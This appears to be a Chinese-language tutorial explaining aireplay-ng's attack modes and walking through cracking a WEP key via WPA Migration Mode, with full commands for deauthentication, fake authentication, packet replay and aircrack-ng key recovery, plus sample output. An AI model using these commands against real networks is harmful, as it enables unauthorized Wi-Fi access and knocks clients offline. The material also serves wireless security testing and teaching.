aireplay-ng的攻擊模式

aireplay-ng 主要功用是做為訊框(frames)注入，用以產生足夠的封包，以供 aircrack-ng 進行 WEP 及WPA-PSK 破解。

基本語法：
　　aireplay-ng <options> <Monitor-Interface>

底下是 aireplay-ng十種操作模式：

--deauth count -0 count	反授權攻擊模式： 對Client發送連線中斷訊息，從而使Client重新發出授權請求，再擷取其請求的封包，而產生有用的arp資訊。 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 mon0 count 是指執行阻斷的次數，如果設為 0 表循環攻擊，Client 將無法上網。
--fakeauth delay -1 delay	偽裝請求授權模式： 當對AP進行攻擊，但沒有Client連到AP時，以致沒有封包產生，就會利用此法來讓AP產生封包。(只適用 WEP，不能用於WPA/WPA2) (一個Console進行 fakeauth 攻擊，另一個console 就可以進行其他監聽或注入) delay 是指每次重送授權請求的間隔秒數 例：aireplay-ng -1 5 -e ap001 -a 00:26:5A:18:CE:0B -h 00:0C:29::C8:C6:3F mon0
--interactive -2	互動模式： 具備封包擷取與封包注入功能 擷取： aireplay-ng -2 -p 0841 -c 00:0C:C6:3F:ff:ff -b 00:26:5A:18:CE:0B -h 00:0C:29::C8:C6:3F mon0 注入： aireplay-ng -2 -r arpFile -x 1024 -b 00:26:5A:18:CE:0B -h 00:0C:29::C8:C6:3F mon0
--arpreplay -3	封包重送模式： 擷取封包分析再重發的方式，目的在對AP產生足夠的請求，讓AP吐出更多封包以供 aircrack-ng 分析。 aireplay-ng -3 -b 00:26:5A:18:CE:0B -h 00:0C:29::C8:C6:3F -x 512 mon0
--chopchop -4	對 WEP 封包進行解密作業(不一定能成功) aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 mon0
--fragment -5	如果成功，可以得到1500字節PRGA（虛擬隨機產生演算法） aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D mon0
-6	Cafe-latte attack 利用擷取 client 發送的 ARP 封包，調整後再回送給 client 端，進而破解 WEP 的金鑰(只適於 WEP) aireplay-ng -6 -h 00:09:5B:EC:EE:F2 -b 00:13:10:30:24:9C -D mon0
-7	Client-oriented fragmentation attac Hirte attack，跟  -6 相同，只是不限於 ARP 封包，也可以利用 IP 封包 aireplay-ng -7 -h 00:09:5B:EC:EE:F2 -D mon0k
-8	WPA 破解：WPA Migration Mode 只用此模式尚無法完成WPA破解，參考詳細步驟 aireplay-ng -8 -b 00:26:0B:2A:BA:40 -h 00:1f:3c:4e:88:46 mon0
--test -9	單純測試目前有哪些AP，以及注入的成功率

＊　如果Client連上AP之後並無上網行為，也不會產生封包，則 --arpreplay(-3)模式也無法讓它產生足夠有效的封包來讓aircrack-ng進行破解，所以會利用 -0 與 -3 搭配，讓Client不斷提出請求封包。

＊　如果沒有Client連上AP，就可以利用 -1 假裝連線要求，再利用 -3 產生大量封包。

過濾用參數：

-b bssid : 基地台的 MAC address

-d dmac : Client 的 MAC address

-s smac : 本機的 MAC address

重送用參數：

-x nbpps : 每秒發送(重送)封包數

-p fctrl : 設置訊框的控制字碼(set frame control word (hex))

-a bssid : 指定 AP 的 MAC address

-c dmac : 指定 Client 的 MAC address

-h smac : 指定本機(mon0)的 MAC address

-e essid : (在 -1 或 -9模式) 指定測試對象的 AP SSID

-j : (-3 模式) : inject FromDS pkts

-k IP : 變更訊框(fragment)的目的 IP

-l IP :變更訊框(fragment)的來源 IP

-o npckts : number of packets per burst (-1)

-q sec : seconds between keep-alives (-1)

-D :不做 AP 偵測

＊　如果要重送封包，有兩種選擇，一種是直接由接收到(Live)的封包逕以重送，一種是利用已存成檔案的封包來重送：

iface : capture packets from this interface

-r file : extract packets from this pcap file

按破解WPA步驟查看

---

破解WEP步驟

步驟一：啟用監聽模式

airmon-ng start wlan0 8

其中 8 是指針對 Channel 進行監聽

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy1]]

(monitor mode enabled on mon0)

步驟二：利用 airodump-ng 擷取 IVs 封包

airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0

-c 8    指定監聽的 Channel

--bssid 00:26:0B:2A:BA:40      指定過濾 AP MAC address

-w output      將擷取的封包寫到檔名為 output 檔案中

CH 8 ][ Elapsed: 36 s ][ 2010-08-11 12:19

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:0B:2A:BA:40 -17 93 339 72360 2043 8 54e. WPA TKIP PSK migrate

BSSID STATION PWR Rate Lost Packets Probes

00:26:0B:2A:BA:40 00:1F:3C:4E:88:46 0 24 - 1 28288 45891

00:26:0B:2A:BA:40 00:02:72:72:20:FE -25 0 -54e 90 11263

步驟三：使用 aireplay-ng 發送偽造授權封包

(新開一個新的 Conslole)

aireplay-ng -1 0 -e migrate –a 00:26:0B:2A:BA:40 -h 00:1f:3c:4e:88:46 mon0

 -1       使用偽請求模式

 0        每秒鐘內發送請求的次數

 -e       AP 的 ESSID

 -a 00:26:0B:2A:BA:40         AP 的 MAC address

 -h 00:1f:3c:4e:88:46            本機網卡(mon0)的MAC address

12:27:40 Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8

12:27:40 Sending Authentication Request (Open System) [ACK]

12:27:40 Authentication successful

12:27:40 Sending Association Request [ACK]

12:27:40 Association successful :-) (AID: 1)

如果收到 deauthentication 封包，請繼續嘗試本步驟，直到 fake authentication正確執行完成，否則不要進行下一個步驟

步驟四： 啟動對 WPA 進行 Migration Mode 攻擊

(開啟新的 Console，並執行下列指令)

aireplay-ng -8 -b 00:26:0B:2A:BA:40 -h 00:1f:3c:4e:88:46 mon0

12:17:52  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8

Saving ARP requests in replay_arp-0811-121752.cap

You should also start airodump-ng to capture replies.

Remember to filter the capture to only keep WEP frames:  "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"

Read 318368 packets (102102 ARPs, 78 ACKs), sent 59315 packets...(500 pps)

注意：

如果收到類似“Got a deauth/disassoc packet. Is the source mac associated?”的訊息，表示已經跟 AP 離線，所有的注入封包都無效，必須重回步驟三執行。

步驟五：利用aircrack-ng執行金鑰破解

(再開一個 Console，並執行：)

aircrack-ng -a 1 -b 00:26:0B:2A:BA:40   output*.cap

- a 1           指定破解對象是WEP 加密金鑰

-b 00:26:0B:2A:BA:40         指定要破解的 AP MAC address

output*.cap          指定封包檔來源

                                                                                            Aircrack-ng 1.2

                                                                            [00:00:00] Tested 763 keys (got 47981 IVs)

   KB    depth   byte(vote)

    0    1/  3   EF(59904) F8(56320) 25(56064) 56(55552) D0(55552) 58(55296) 74(54528) FA(54528) 7D(54272) 86(53760) C7(53504) E7(53504) ED(53504) B0(53248) B9(53248) D7(53248)

    1    3/  5   99(56576) AA(56320) 6E(55552) 1A(55040) 25(55040) 3D(55040) 50(55040) 87(55040) 61(54784) 71(54784) D9(54528) 60(54272) BB(54272) F8(54272) 24(54016) E6(54016)

    2   20/  2   51(52992) 5F(52736) 7C(52736) 8F(52736) C5(52736) 23(52480) 76(52480) 77(52480) B5(52480) DD(52480) 47(52224) 5C(52224) 53(51968) D3(51968) DE(51968) 0B(51712)

    3    0/  1   B9(69120) 3B(57856) B0(57344) 53(55808) A2(55808) 96(55296) E4(55296) 5D(54784) D5(54784) 6E(54528) 38(54272) 65(54272) 4C(54016) 78(54016) F6(54016) 21(53760)

    4    7/  4   32(56576) 95(55808) 4D(54528) 82(54528) AE(54272) 0F(53760) 39(53760) B0(53760) F5(53760) 6E(53504) 97(53504) 11(53248) A1(53248) B3(53248) 5C(52992) 20(52736)

             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ]

        Decrypted correctly: 100%